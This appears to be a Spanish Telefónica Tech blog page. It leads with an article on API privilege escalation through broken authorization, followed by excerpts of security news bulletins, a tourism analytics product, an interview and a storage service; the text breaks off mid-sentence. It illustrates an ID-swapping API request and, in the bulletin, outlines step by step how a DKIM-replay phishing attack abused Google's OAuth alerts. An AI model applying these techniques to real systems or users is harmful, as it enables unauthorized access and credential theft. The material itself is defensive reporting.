Las interfaces de programación de aplicaciones (API) permiten que distintos sistemas y aplicaciones se comuniquen entre sí, compartiendo datos y funcionalidades de forma ágil. En el desarrollo moderno, se han convertido en el tejido conector de aplicaciones, servicios y plataformas. Sin embargo, esa misma relevancia también las convierte en objetivo principal de los atacantes. Uno de los problemas más críticos, y a menudo subestimado, es el escalado de privilegios debido a fallos en la autenticación y autorización. Este fallo no es simplemente técnico: nace de debilidades en los procesos de desarrollo, integración y despliegue (DevOps), y puede comprometer completamente la seguridad de una organización. En muchos casos, el problema se origina desde la propia codificación, cuando no se definen adecuadamente los controles de acceso o se reutilizan patrones inseguros. El ritmo acelerado del desarrollo continuo puede llevar a que se priorice la funcionalidad sobre la seguridad, dejando brechas que pueden ser explotadas en producción si no se detectan a tiempo. El escalado de privilegios en las API es uno de los riesgos más críticos que enfrenta la seguridad moderna. El talón de Aquiles: autenticación y autorización defectuosas En el contexto de las API, que la autenticación se rompa significa que el sistema no puede verificar adecuadamente quién es el usuario. Por su parte, la autorización deficiente implica que, aun cuando el usuario está identificado correctamente, puede acceder a recursos o realizar acciones fuera de su ámbito legítimo. Esto ocurre, por ejemplo, cuando un atacante modifica una llamada API como: GET /api/user/12345 y cambia el identificador a: GET /api/user/12346 Si el backend no valida que el usuario tiene permiso para acceder a ese recurso, se produce una vulnerabilidad de seguridad crítica. Este tipo de vulnerabilidades son aprovechadas por atacantes para realizar escalado horizontal (acceso a los recursos de otros usuarios) y escalado vertical (acceso a funciones administrativas o privilegiadas). La autenticación defectuosa y la autorización deficiente pueden comprometer completamente la seguridad de una organización. ¿Por qué ocurre esto? Fallos en el proceso DevSecOps La mayoría de las vulnerabilidades de autenticación/autorización no aparecen por errores individuales, sino por una falta de enfoque en la seguridad desde las primeras fases del ciclo de vida del desarrollo (SDLC). Entre los principales factores: Falta de pruebas automatizadas de seguridad en pipelines CI/CD. Dependencia excesiva de frameworks sin validar su configuración segura. Mala gestión de tokens y credenciales en variables de entorno o repositorios. Ausencia de principios de mínimo privilegio en el diseño de las API. Desconexión entre equipos de desarrollo y seguridad (Dev vs Sec) ■ Estos problemas se agravan con la presión por entregar rápido, donde la seguridad es vista como una barrera en lugar de un habilitador. Otros peligros comunes en las API Es importante también mencionar otros vectores de riesgo frecuentes que pueden ser usados como punto de entrada para vulnerabilidades más graves, incluyendo el escalado de privilegios: Exposición excesiva de datos: el API devuelve respuestas con más información de la necesaria, como correos, tokens o campos internos. Rate limiting inexistente: sin protección ante ataques de denegación de servicio, fuerza bruta o scraping (extracción automatizada masiva de información pública o privada desde una API). Falta de validación de entradas: permite inyecciones (SQL, NoSQL, comandos, etc.) y otros ataques. Gestión insegura de secretos: claves API y tokens expuestos en frontend o repositorios públicos. El ritmo acelerado del desarrollo continuo puede llevar a que se priorice la funcionalidad sobre la seguridad, dejando brechas explotables. WAD de Telefónica Tech: seguridad en el ciclo de vida completo Frente a este escenario, la solución WAD (Web Application Defense) que ofrecemos desde Telefónica Tech ofrece una defensa proactiva y adaptativa para las API y las aplicaciones web. A diferencia de mecanismos tradicionales centrados solo en el perímetro, WAD se integra dentro del flujo de DevSecOps para ofrecer protección continua. ¿Qué hace WAD? Autodiscovery de API: identifica y cataloga automáticamente todas las API expuestas, incluso las no documentadas. Análisis de tráfico y detección de anomalías: monitoriza comportamiento en tiempo real para identificar patrones anómalos. Protección contra escalado de privilegios: verifica que cada solicitud cumpla con las reglas de acceso definidas, bloqueando intentos de acceso no autorizados. Integración en el pipeline CI/CD: permite validar la seguridad de las API en cada despliegue. Control de exposición de datos: filtrado inteligente de respuestas para evitar fugas de información sensible. Rate limiting dinámico: prevención de abuso y automatización maliciosa. Beneficios clave Visibilidad total del tráfico API y las amenazas asociadas. Respuesta en tiempo real a intentos de intrusión o mal uso. Reducción del riesgo de brechas causadas por errores de desarrollo. Fortalecimiento del gobierno y cumplimiento (GDPR, ISO, NIST). A continuación, aparece un video donde se puede ver lo comentado, cómo un API mal diseñada puede permitir el escalado de privilegios mediante la manipulación de roles. En el ejemplo, un usuario con permisos básicos consigue cambiar su rol a administrador aprovechando deficiencias en la lógica de autorización del backend, como la ausencia de validaciones robustas y controles de acceso poco estrictos. Este tipo de vulnerabilidad, común en las API con codificación insegura, representa un riesgo significativo ya que permite a un atacante acceder a funcionalidades críticas del sistema sin autorización legítima, manipulando ciertos parámetros de la petición para obtener acceso a funcionalidades restringidas, exponiendo así la fragilidad de una arquitectura sin controles de seguridad efectivos. También se presenta cómo la implementación de WAD puede prevenir este tipo de situaciones mediante la verificación de patrones de acceso y el bloqueo de solicitudes que no cumplen con las políticas de autorización establecidas. Conclusión: no basta con desarrollar, hay que defender Las API han revolucionado el desarrollo moderno, pero también han abierto nuevas superficies de ataque. El escalado de privilegios por fallos de autenticación o autorización es una amenaza real que puede derivar en robo de datos, suplantación de identidad o compromiso total de sistemas internos. Soluciones como WAD de Telefónica Tech nos permiten integrar la seguridad desde la concepción hasta la operación; abordando no solo los síntomas, sino las causas estructurales de la falta de seguridad en las API. El cambio hacia una cultura de seguridad en DevOps no es opcional: es la única forma de sostener la agilidad sin comprometer la protección de los activos digitales. ■ ¿Tu organización está lista para blindar sus API? Quizás sea momento de integrar una defensa moderna y continua como WAD, antes de que lo inevitable ocurra. Contáctanos → Ciberseguridad Simplifica la protección de aplicaciones: cómo Telefónica Tech WAD asegura tu negocio 10 de septiembre de 2024
28 de abril de 2025
Boletín Semanal de Ciberseguridad, 19-25 abril
Parche de Microsoft para CVE-2025-21204 desencadena otra vulnerabilidad El investigador Kevin Beaumont ha revelado que el parche de Microsoft para la vulnerabilidad CVE-2025-21204 (CVSSv3 7.8 según fabricante), relacionada con enlaces simbólicos (symlinks), introduce inadvertidamente una nueva falla de seguridad. La corrección original consistía en crear la carpeta C:\inetpub para evitar que usuarios no autorizados la manipularan. Sin embargo, Beaumont descubrió que un usuario sin privilegios administrativos puede crear un enlace simbólico desde C:\inetpub hacia otro archivo, como notepad.exe, lo que provoca que futuras actualizaciones de seguridad de Windows no se apliquen correctamente, generando errores o alterando los cambios. Esta situación permite a usuarios no administradores bloquear las actualizaciones del sistema, exponiéndolo a riesgos adicionales. Beaumont informó de esta vulnerabilidad a Microsoft hace dos semanas, pero hasta la fecha no ha recibido respuesta. Más info TAG-124: infraestructura maliciosa para propagar malware Investigadores de Recorded Future han identificado que múltiples actores de amenazas, incluidos grupos de ransomware como Rhysida e Interlock, y entidades estatales como TA866 (Asylum Ambuscade), están utilizando la infraestructura maliciosa TAG-124 para distribuir malware de forma altamente dirigida. Este sistema de distribución de tráfico (TDS) opera recopilando datos del navegador, geolocalización y comportamiento del usuario para redirigir a las víctimas hacia cargas útiles maliciosas, mientras evita su detección. TAG-124 ha sido clave en ataques a sectores críticos, como el sanitario y financiero, y se ha vinculado a campañas de envenenamiento SEO y compromiso de sitios web legítimos. Su uso permite a los actores maliciosos especializarse en etapas posteriores del ataque, aumentando la eficacia de sus campañas de extorsión. Más info Nuevos ataques de phishing aprovechan la infraestructura de Google Nick Johnson, de Ethereum Name Service (ENS), detectó un ataque de phishing de repetición DKIM. Los atacantes primero registraban un dominio y creaban una cuenta de Google para me@dominio. Después, creaban una aplicación Google OAuth utilizando como nombre todo el mensaje de phishing, con muchos espacios en blanco para separarlo de la notificación de Google sobre el acceso a la cuenta del atacante. Tras el acceso, Google enviaba automáticamente una alerta de seguridad que los atacantes reenviaban a las víctimas, pasando todas las verificaciones. El mensaje instaba a los usuarios a acceder a un supuesto portal de asistencia, un duplicado exacto del real, en el cual se solicitaban las credenciales de su cuenta de Google. El portal fraudulento estaba alojado en sites.google.com, la plataforma gratuita de creación de sitios web de Google, en lugar de en accounts.google.com, haciendo sospechar de que se trataba de un phishing. Más info Corregidos dos fallos 0-day activamente explotados en productos de Apple Apple ha publicado actualizaciones de seguridad de emergencia que parchean dos fallos 0-day activamente explotados contra dispositivos iOS de objetivos específicos. Las vulnerabilidades se encuentran en CoreAudio (CVE-2025-31200, CVSSv3 de 7.5) y RPAC (CVE-2025-31201, CVSSv3 de 6.8), afectando ambas a iOS, macOS, tvOS, iPadOS y visionOS. El primero puede aprovecharse procesando un flujo de audio en un archivo multimedia malicioso para ejecutar código remoto en el dispositivo vulnerable. La segunda permite a atacantes con acceso de lectura o escritura eludir la autenticación por puntero (PAC). Si bien la lista de dispositivos afectados es extensa, incluyendo modelos antiguos y más recientes, ambas fallas se han corregido en las versiones iOS 18.4.1, iPadOS 18.4.1, tvOS 18.4.1, macOS Sequoia 15.4.1 y visionOS 2.4.1. Apple recomienda a los usuarios que apliquen las actualizaciones correspondientes lo antes posible. Más info Expuesta la infraestructura operativa de RedGolf Se ha descubierto un servidor expuesto brevemente que reveló una colección de herramientas y scripts vinculados al malware KeyPlug, utilizado por el grupo RedGolf (APT41). Esto permitió acceder a tácticas avanzadas, incluyendo scripts dirigidos a dispositivos Fortinet y objetivos específicos. Entre las herramientas destacaban scripts en Python para reconocimiento de versiones mediante hashes JavaScript, identificación de sistemas orientados a Internet y explotación de fallos en WebSocket CLI de Fortinet. También se descubrió un webshell PHP cifrado para ejecución remota, un reverse shell en PowerShell y un binario ELF que funcionaba como oyente HTTP. El servidor compartía un certificado TLS emitido por WolfSSL con otros cinco servidores alojados en Vultr, lo que evidencia una infraestructura más amplia. La exposición fue detectada por @Jane_0sint en X y analizada por el equipo de investigadores de Hunt.io. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
25 de abril de 2025
Sistema de Inteligencia Turística (SIT): plataforma de análisis para optimizar la gestión turística
Mientras algunos destinos turísticos luchan contra la masificación, otros buscan atraer visitantes. Entre ambos extremos está el desafío de gestionar el turismo de forma inteligente, maximizando sus beneficios económicos y sociales mientras se minimizan sus impactos negativos. La diferencia entre el éxito y el fracaso a menudo radica en una sola cosa: la capacidad de tomar decisiones basadas en datos y no en suposiciones. En Telefónica Tech hemos desarrollado el Sistema de Inteligencia Turística (SIT), una plataforma que proporciona a los municipios datos críticos para optimizar recursos, atraer al visitante adecuado y crear experiencias que beneficien a turistas y residentes. El poder de los datos marca la diferencia entre contar turistas y crear valor. Qué es SIT: inteligencia turística en acción SIT (Sistema de Inteligencia Turística) es una solución basada en la plataforma Smart Steps de Telefónica Tech que procesa y analiza grandes volúmenes de datos para la gestión turística, transformando datos masivos en conocimiento útil. La plataforma SIT genera métricas e indicadores sobre aspectos clave de la actividad turística utilizando algoritmos de aprendizaje automático, análisis estadístico y múltiples fuentes de información para dar respuesta precisa a preguntas relevantes como: ¿Cuáles son los patrones de comportamiento de los visitantes? ¿Qué segmentos turísticos generan más valor para el destino? ¿Cómo redistribuir flujos para evitar la congestión? ¿Cuál es el impacto de eventos y campañas? El sistema permite correlacionar múltiples variables y segmentar datos demográficos y conductuales para transformar datos complejos en estrategias efectivas. Por ejemplo, al identificar los segmentos que generan mayor impacto económico con menor presión sobre los recursos, los destinos pueden enfocar sus inversiones promocionales de manera más eficiente. La plataforma incluye monitorización para gestionar proactivamente situaciones de alta afluencia. Esto permite desde reforzar servicios en zonas específicas hasta implementar recomendaciones dinámicas para redirigir visitantes a áreas menos congestionadas. El sistema evalúa métricas de impacto de eventos y se integra con APIs de sistemas externos (tráfico, clima, etc.) para correlacionar estos datos con los patrones turísticos y facilitar decisiones basadas en evidencia. Componentes del Sistema de Inteligencia Turística (SIT) Para entender cómo SIT puede mejorar la gestión turística de un municipio, es fundamental conocer sus tres componentes principales: Datos SIT procesa y organiza diversas fuentes de datos heterogéneas. El sistema integra y analiza múltiples fuentes de datos: Movimientos de visitantes (patrones de desplazamiento, duración de estancia, lugares de interés). Perfiles demográficos y socioeconómicos de turistas. Datos de consumo y gasto. Tendencias de búsqueda online relacionadas con el destino. Valoraciones y opiniones en plataformas digitales. Información sobre eventos, meteorología y transporte. Esta información, previamente dispersa o inaccesible, se procesa y presenta en dashboards configurables con filtros y parámetros ajustables. Esto permite visualizar series temporales, mapas de calor, diagramas de flujo y otros elementos visuales que facilitan la identificación de patrones estadísticamente relevantes. Plataforma tecnológica La plataforma tecnológica de SIT opera en la nube, eliminando la necesidad de infraestructuras locales complejas y costosas. Su arquitectura está diseñada para: Procesar grandes volúmenes de datos en tiempo real. Aplicar máxima seguridad y cumplimiento normativo (GDPR y regulaciones locales). Escalar de acuerdo con las necesidades de cada municipio. Integrarse con sistemas existentes mediante API públicas. Proporcionar acceso personalizado a diferentes perfiles de usuario. La tecnología de SIT combina lo mejor del Big Aata, IA y experiencia de usuario. Así, hace que información compleja sea accesible para usuarios sin formación técnica. Servicios profesionales Sabemos que la tecnología no transforma destinos. Por eso, SIT incluye un componente humano esencial: un equipo de expertos en turismo digital que: Acompaña a las administraciones en el proceso de implementación. Identifica oportunidades concretas para cada destino. Capacita a los equipos locales para aprovechar al máximo el valor de la plataforma. Facilita el desarrollo de casos de uso adaptados. Ayuda a interpretar los datos y transformarlos en estrategias efectivas. Este acompañamiento garantiza que la inversión tecnológica se traduzca en resultados tangibles, ayudando a las administraciones a superar la barrera entre datos y acción. El análisis avanzado de datos hace visible lo invisible y accionable lo inaccesible. Adaptabilidad a cada municipio y situación particular No hay destinos turísticos idénticos, y SIT reconoce esta realidad. La plataforma tiene una arquitectura modular que se adapta a las necesidades de cada territorio, sin importar su tamaño, recursos o madurez digital. Sistema modular de SIT. Para municipios pequeños y medianos, SIT ofrece una versión de implementación rápida y de bajo coste, con informes predefinidos que permiten obtener resultados inmediatos sin grandes inversiones iniciales en infraestructura o personal especializado. Los destinos turísticos más grandes pueden acceder a una versión más robusta, capaz de integrar múltiples fuentes de datos, desarrollar cuadros de mando personalizados y gestionar grandes volúmenes de información. Esta configuración responde a las necesidades de ciudades que requieren soluciones avanzadas para manejar su ecosistema turístico. En su nivel más avanzado, SIT facilita la creación de espacios de datos turísticos, integrándose con ecosistemas propios y de terceros. Esto permite a los destinos adaptarse a cualquier arquitectura existente y cumplir requisitos normativos específicos, posibilitando una integración completa con los sistemas de información existentes. Esta flexibilidad permite que cualquier destino, desde pequeños municipios rurales hasta grandes capitales turísticas, se beneficie de la transformación digital sin enfrentar obstáculos tecnológicos o presupuestarios. Beneficios clave de SIT La implementación de SIT ofrece ventajas específicas que afectan a todos los actores del ecosistema turístico local. Para las administraciones públicas, SIT modifica la toma de decisiones al sustituir las suposiciones por datos reales. Los ayuntamientos pueden optimizar sus inversiones en promoción e infraestructuras, medir el retorno de sus iniciativas, anticiparse a tendencias emergentes y distribuir más eficientemente sus recursos. ■ Esta capacidad analítica facilita una mejor coordinación entre departamentos municipales, alineando objetivos y estrategias. La población local experimenta una reducción de las externalidades negativas del turismo mal gestionado. SIT promueve un equilibrio entre las necesidades de residentes y visitantes, ayudando a preservar la identidad cultural y el patrimonio local. ■ Al mismo tiempo, contribuye a crear oportunidades económicas sostenibles y mejorar servicios públicos, involucrando a la comunidad en definir el modelo turístico que se desea. Para los visitantes, el impacto se traduce en experiencias con menor congestión y una oferta turística mejor alineada con sus intereses. Reciben información contextualizada que enriquece su visita, descubren atractivos menos conocidos pero relevantes y disfrutan de servicios públicos ajustados a las necesidades. ■ Todo contribuye a incrementar la satisfacción del visitante y potencialmente aumentar la duración de la estancia y el gasto. El equilibrio turístico posibilita que visitantes y residentes compartan los espacios y los beneficios. Innovaciones y futuro de SIT SIT no es una plataforma estática, sino un ecosistema que se actualiza regularmente para incorporar nuevas capacidades que respondan a los desafíos del sector turístico. Nuestro roadmap de innovación se centra en tres áreas clave: Expansión de fuentes de datos Integración con operadores de transporte aéreo y terrestre para analizar flujos globales de viajeros. Incorporación de datos de plataformas de economía colaborativa (alojamientos, experiencias, etc.). Conexión con sistemas de pago para análisis avanzado del gasto turístico. Monitorización de la huella digital del destino (redes sociales, búsquedas, etc.) Avances tecnológicos Capacidad de procesamiento de grandes volúmenes de datos de múltiples fuentes. Generación de dashboards complejos y enriquecidos analíticamente. Algoritmos predictivos para anticipar tendencias y comportamientos. Interfaces conversacionales facilitan consultas en lenguaje natural. Tecnologías inmersivas para visualización avanzada de datos. Modelos de IA generativa para simular escenarios futuros. Nuevos casos de uso Gestión sostenible de la capacidad de carga de recursos naturales y culturales. Cálculo y reducción de la huella de carbono del turismo. Segmentación avanzada para optimizar recomendaciones según el perfil del visitante. Coordinación entre múltiples destinos para crear corredores turísticos inteligentes. Sistemas de alerta anticipada para emergencias en el sector. En Telefónica Tech mantenemos un compromiso con la cocreación. Colaboramos con administraciones públicas, universidades y actores del sector privado para asegurar que SIT evoluciona en la dirección que requieren los territorios para desarrollar un turismo sostenible, inclusivo y viable. Conclusión Nuestro Sistema Integrado de Turismo es una herramienta de análisis que busca equilibrar el desarrollo económico del turismo con la sostenibilidad social y ambiental mediante el uso intensivo de datos. Los destinos sostenibles no se miden por el número de visitantes, sino por el valor que generan y preservan. SIT proporciona información estructurada para la toma de decisiones en un mundo donde los destinos compiten globalmente por la atención de viajeros exigentes y las comunidades locales demandan modelos turísticos sostenibles. Los destinos que logren un equilibrio entre atracción de visitantes, generación de valor económico y preservación de recursos locales tendrán una ventaja competitiva. SIT es una herramienta que facilita ese equilibrio mediante el análisis de datos. IA & Data Destinos Turísticos Inteligentes: Optimización de recursos y personalización de experiencias 27 de septiembre de 2023
24 de abril de 2025
"Nuestra prioridad es proteger y transformar el entorno empresarial en México" —Rafael González
Rafael González, Country Manager de Telefónica Tech en México, comparte con nosotros su visión de cómo estamos transformando el entorno digital en la región, implementando soluciones avanzadas de Ciberseguridad y tecnologías de IoT para una gestión eficiente y segura de la movilidad empresarial. ______ ¿Cómo estamos protegiendo los datos y activos digitales de nuestros clientes en México? Desde Telefónica Tech hemos implementado una serie de medidas avanzadas para proteger los datos y activos digitales de nuestros clientes en México. Nuestro portafolio de soluciones de Ciberseguridad, NextDefense, proporciona protección contra amenazas, inteligencia de amenazas y respuesta a incidentes. Estas soluciones detectan, previenen y mitigan ciberataques, protegiendo con tecnología avanzada endpoints, redes y aplicaciones Además, en México se ubica uno de los Centros de Operaciones de Seguridad (SOC) de la red global de Telefónica Tech. Con un servicio 24x7 provisionamos las soluciones de seguridad de nuestros clientes y las configuramos para aportar la mayor visibilidad y protección posible, trabajando en sincronía con el Digital Operations Center (DOC) que permite monitorizar y gestionar en tiempo real la infraestructura digital de nuestros clientes. Desde Telefónica Tech hemos implementado medidas avanzadas para proteger los datos y activos digitales de nuestros clientes en México. ¿Cómo enfrentamos las ciberamenazas emergentes en la región? En Telefónica Tech apostamos por la capacitación continua y la actualización de nuestros profesionales en el ámbito de la Ciberseguridad. Además, nuestro ecosistema de partners proporciona acceso a soluciones y tecnologías avanzadas. Adoptamos tecnologías avanzadas como la inteligencia artificial y el machine learning para automatizar procesos de Ciberseguridad; por ejemplo, detectar patrones de comportamiento y anomalías. Esto nos permite ser más eficientes y anticipar y responder ciberamenazas antes de que supongan un problema. Nuestro portafolio de soluciones de Ciberseguridad, NextDefense, proporciona protección contra amenazas, inteligencia de amenazas y respuesta a incidentes. ¿Cómo contribuye nuestra plataforma Kite al desarrollo de soluciones IoT? Nuestra plataforma Kite de Telefónica Tech es una solución de conectividad gestionada que permite a nuestros clientes controlar y monitorizar sus dispositivos IoT en tiempo real y de forma remota. Kite incluye funcionalidades diferenciales como el control en tiempo real del gasto y consumo del tráfico generado por los dispositivos IoT y su geolocalización basada en ID del móvil. Estas características permiten a las empresas mexicanas implementar controles de uso y gasto, conocer la ubicación de sus dispositivos, y evitar usos fraudulentos, facilitando así una gestión más eficiente y segura de la movilidad. ¿Cuál es el impacto previsto de implementar Kite en la gestión de la movilidad? Esperamos que la implementación de Kite tenga un impacto significativo en la gestión de la movilidad en México, mejorando la eficiencia operativa de nuestras soluciones de IoT. Con tecnologías como 5G y NB-IoT integradas en Kite, podemos ofrecer conectividad de alta calidad y soluciones avanzadas para diversos sectores, desde la gestión de flotas hasta las ciudades inteligentes. Esta conectividad permitirá a las empresas tomar decisiones más informadas y optimizar sus operaciones, contribuyendo a un entorno más seguro y eficiente. ¿Cuáles son las perspectivas para el futuro de Telefónica Tech en México? Estamos implementando planes ambiciosos para expandir nuestra presencia en México, realizando inversiones significativas en infraestructura de Ciberseguridad y tecnología cloud de última generación. Además, estamos implementando programas de formación técnica para desarrollar el talento local. Creemos que la estandarización de tecnologías como la conectividad IoT híbrida y la integración de soluciones de Ciberseguridad avanzadas permitirá a las empresas mexicanas mejorar su competitividad y enfrentar los desafíos del futuro con confianza y agilidad. México alberga uno de los Centros de Operaciones de Seguridad (SOC) de la red global de Telefónica Tech. ¿Qué valores considera fundamentales para dirigir a su equipo y enfrentar los desafíos diarios de la industria de la tecnología? Trabajo con un liderazgo colaborativo inspirador, que se basa en compartir experiencias en diversas situaciones con el equipo, escuchar y tomar decisiones conjuntas para el beneficio de la compañía. En el contexto actual y especialmente en nuestro sector, es fundamental el aprendizaje continuo debido a los rápidos cambios tecnológicos. Es importante reconocer que lo que es válido para un cliente puede no serlo para otro, lo que requiere adaptabilidad y flexibilidad. El sentido de pertenencia es fundamental para mí y lo enfatizo a mi equipo: tomar decisiones como si esta fuera su propia compañía. Siempre debemos sobresalir en nuestras actividades a través de la ética, la dedicación y la transparencia. Apasionado de la Fórmula 1 e incondicional de Lewis Hamilton. ¿Podrías compartir algún momento o experiencia memorable en tu carrera que haya marcado tu trayectoria profesional en Telefónica Tech? La semana que me incorporé a la compañía tuve que defender el contrato de Ciberseguridad más grande que esta empresa ha obtenido hasta hoy en México, lo cual implicó entrenarme, entender el historial y nuestra posición en la negociación junto con un equipo de profesionales. Esto demuestra que en esta empresa siempre se debe estar preparado para actuar. El nivel de conocimiento que vi en esa mesa de negociación y la calidad de los entregables me confirmaron que había tomado la mejor decisión de mi carrera y estaba en la mejor empresa del sector. Adoptamos tecnologías avanzadas como IA y machine learning para automatizar procesos de Ciberseguridad. ¿Cómo equilibras tu vida personal con las exigencias de tu papel en Telefónica Tech? ¿Tienes alguna afición o actividad que disfrutes especialmente? Soy aficionado al buen fútbol y a la Fórmula 1. Soy seguidor del FC Barcelona y considero que este año el equipo tiene un buen grupo de jugadores jóvenes y un entrenador que ha introducido una nueva forma de jugar, más vertical y rápida. Actualmente, es uno de los equipos más destacados de Europa. En cuanto a la Fórmula 1, apoyo a Lewis Hamilton. Estuve presente en el Gran Premio de México cuando ganó su séptimo campeonato, lo cual fue una experiencia notable. En mi día a día hago ejercicio, y los fines de semana camino entre 12-15 km durante dos horas. Esto me ayuda a despejarme, analizar la semana y encontrar nuevas perspectivas para abordar diferentes situaciones.
16 de abril de 2025
Almacenamiento como Servicio (STaaS), una solución robusta para la gestión de datos
El Almacenamiento como Servicio, conocido como Storage as a Service (STaaS), es un modelo de servicio Cloud que permite a las empresas acceder a soluciones de almacenamiento de datos de manera flexible y escalable, sin necesidad de realizar grandes inversiones en infraestructura. Este servicio ofrece diversas modalidades de almacenamiento para adaptarse a las necesidades específicas de cada cliente, para descentralizar y simplificar el almacenamiento de datos e información empresarial. Esto permite a las empresas centrarse en sus actividades principales sin preocuparse por la gestión y el mantenimiento de su infraestructura de almacenamiento. Se trata por tanto de un servicio especialmente adecuado para empresas que necesitan almacenamiento de alto rendimiento para sus servidores y máquinas virtuales, organizaciones que requieren almacenamiento compartido, fiable y seguro para sus datos estructurados y no estructurados, y negocios que buscan soluciones de almacenamiento en la nube con alta escalabilidad y accesibilidad a través de API compatibles. El almacenamiento en la nube no solo es una tendencia, sino una necesidad crítica para las empresas que buscan mantenerse competitivas y seguras. A quién está dirigido el Almacenamiento como Servicio Un servicio de Almacenamiento como Servicio es indispensable para cualquier empresa que esté inmersa en un proceso de transformación digital y necesite gestionar grandes volúmenes de datos de manera eficiente y segura. Entre los principales usuarios de este servicio se encuentran empresas que utilizan servicios de housing o hosting y que requieren almacenamiento de altas prestaciones, organizaciones que necesitan almacenamiento CIFS (Common Internet File System) y NFS (Network File System) para acceder y compartir archivos entre servidores y máquinas virtuales, desplegadas tanto en sus oficinas como en datacenters externos. También para empresas que buscan almacenar datos procedentes de IA Generativa, IoT, destino de backup y otros datos no estructurados en la nube para aplicaciones de backup, archivado y otras compatibles con almacenamiento de objetos. Disponer de soluciones de almacenamiento flexibles y seguras es un factor clave para el éxito empresarial. Nuestra propuesta Cloud Storage de Telefónica Tech En Telefónica Tech hemos completado el lanzamiento del nuevo servicio Cloud Storage en asociación con NetApp, líder en soluciones de almacenamiento de datos. Esta colaboración estratégica permite a nuestros clientes acceder a una solución de almacenamiento soberana, distribuida, hiperconectada y sostenible, con las funcionalidades más innovadoras y actuales, como la protección integrada contra el ransomware. Este servicio forma parte junto con VDC de nuestra oferta de Infraestructura Cloud Pública y Privada propia de Telefónica, englobada bajo el paraguas común de Telefónica Tech Cloud Platform. De este modo, el servicio Cloud Storage ofrece una serie de características destacadas que satisfacen las necesidades de conservación de datos de las empresas. Entre las principales características se incluyen: Robustez: La solución garantiza la disponibilidad y durabilidad de los datos almacenados en cabinas de nuestro partner NetApp, proporcionando un entorno seguro y confiable para la gestión de la información empresarial. Hablamos de varias gamas con distintos niveles de prestaciones que en el nivel superior son capaces de proporcionar latencia de hasta medio milisegundo, que permiten cubrir las necesidades de las aplicaciones más exigentes. Soberanía: Los productos bajo Telefónica Tech Cloud Platform garantizan protección de información confidencial, secreta y de alto secreto. Queda garantizada la soberanía del dato, y su almacenamiento siempre, incluso en las réplicas, dentro del territorio nacional. La implementación de IA requiere una inversión significativa en infraestructura local. En caso de optar por soluciones Cloud será fundamental asegurar la soberanía de los datos estratégicos y/o confidenciales. Seguridad: El servicio contará con políticas antiransomware claras, facilitando la seguridad y el cumplimiento normativo en lo que respecta a las salvaguardias de los datos. Predictibilidad: El servicio se contrata en modalidad pago fijo según el volumen de GB contratados, sin que entren en juego otros factores como el número de operaciones de lectura/escritura o el tráfico. En este sentido garantiza una facturación predecible. Continuidad: En situaciones donde se requieran copias en múltiples proveedores de nube debido a regulaciones o requisitos para la continuidad de negocio, se puede usar Cloud Storage como destino primario para los datos activos y configurar las réplicas en un segundo proveedor más económico para el almacenamiento de datos inactivos. Cercanía: Telefónica Tech tiene una dilatada experiencia en proporcionar servicios locales de manera directa y en consonancia con las necesidades del mercado español e iberoamericano. Servicios de protección local y protección remota: ofrecemos opciones de snapshot en local y un segundo snapshot en remoto, que ofrecen un primer nivel de protección del dato con importantes ventajas por su rapidez, eficiencia y flexibilidad. Admisión de protocolos de bloque, CIFS, NFS y S3, según la gama contratada. Esto permite el uso de todo tipo de aplicaciones y de todas las disposiciones que podamos encontrar en los servidores. Copias y reducción de costes: El protocolo S3 permite la creación de copias hacia la gama de almacenamiento de objetos, que tiene un coste inferior a la del resto de las gamas, en función del nº de GB contratados y sin ningún coste por operaciones de acceso o tráfico generado. Flexibilidad: El servicio permitirá aumentar la capacidad contratada de forma dinámica, con un coste predecible y aprovisionamiento inmediato sin disrupción de servicio, incluso haciendo uso de capacidades en las nubes públicas (hiperescalares). Con la colaboración estratégica con nuestro partner NetApp, desde Telefónica Tech reforzamos nuestra posición como proveedor para el mercado empresarial. Nuestra solución integral y escalable de Almacenamiento como Servicio responde a las necesidades de las empresas en la era digital, asegurando la eficiencia, seguridad, y flexibilidad que necesitan para gestionar y proteger sus datos, permitiéndoles concentrarse en su crecimiento y éxito sin las preocupaciones de la infraestructura de TI. ■ El servicio se ofrece tanto en España como en Chile, USA y Perú, con planes para expandirse al resto de países en los que Telefónica Tech despliega sus servicios, siempre con las mismas características. Cloud La importancia de FinOps en la gestión y optimización de los costes en la nube 19 de noviembre de 2024
14 de abril de 2025
Boletín Semanal de Ciberseguridad, 4-11 abril
Microsoft corrige una 0-day activamente explotada en su Patch Tuesday de abril Microsoft ha lanzado su Patch Tuesday correspondiente a abril de 2025, en el que se han solucionado un total de 134 vulnerabilidades, incluyendo un fallo de seguridad 0-day que estaba siendo activamente explotado. Entre los fallos corregidos, destacan once vulnerabilidades críticas relacionadas con ejecución remota de código. El desglose de errores incluye 49 vulnerabilidades de elevación de privilegios, 31 de ejecución remota de código, 17 de divulgación de información, 14 de denegación de servicio, 9 de bypass de funciones de seguridad y 3 de suplantación de identidad. En concreto, la vulnerabilidad 0-day identificada como CVE-2025-29824 (CVSSv3 7.8 según Microsoft) afecta al controlador de Windows Common Log File System (CLFS) y permite a atacantes locales obtener privilegios de SYSTEM. Microsoft confirmó que esta vulnerabilidad fue utilizada por el grupo de ransomware RansomEXX para escalar privilegios en sistemas comprometidos. Por el momento, los parches solo están disponibles para Windows 11 y Windows Server, quedando pendientes las actualizaciones para Windows 10. Microsoft ha indicado que estas estarán disponibles próximamente. Más info Análisis de NeptuneRAT CYFIRMA ha publicado un análisis sobre la nueva versión de NeptuneRAT, un troyano de acceso remoto (RAT) desarrollado en Visual Basic .NET que representa una amenaza significativa para los usuarios de Windows. Creado por ABOLHB y RINO, miembros del grupo Freemasonry, este malware se distribuye a través de plataformas como GitHub, Telegram y YouTube, donde se promociona como el “RAT más avanzado”, atrayendo tanto a principiantes como a actores maliciosos experimentados. Entre sus funcionalidades destacan la extracción de credenciales de más de 270 aplicaciones, la alteración de direcciones de monederos de criptomonedas copiadas en el portapapeles, la capacidad de desplegar ransomware mediante módulos internos como Ransomware.dll, y la monitorización en tiempo real del escritorio de la víctima. Además, puede deshabilitar software antivirus y manipular el registro del sistema para garantizar su persistencia. NeptuneRAT utiliza técnicas avanzadas de ofuscación, como el uso de caracteres árabes y emojis en su código, para dificultar su análisis y detección. Aunque sus desarrolladores aseguran que se trata de una versión gratuita destinada a fines educativos y éticos, insinúan la existencia de una versión más avanzada disponible tras un pago. Más info La evolución del cibercrimen ruso: sofisticación, resiliencia y nuevas amenazas globales Un nuevo informe de Trend 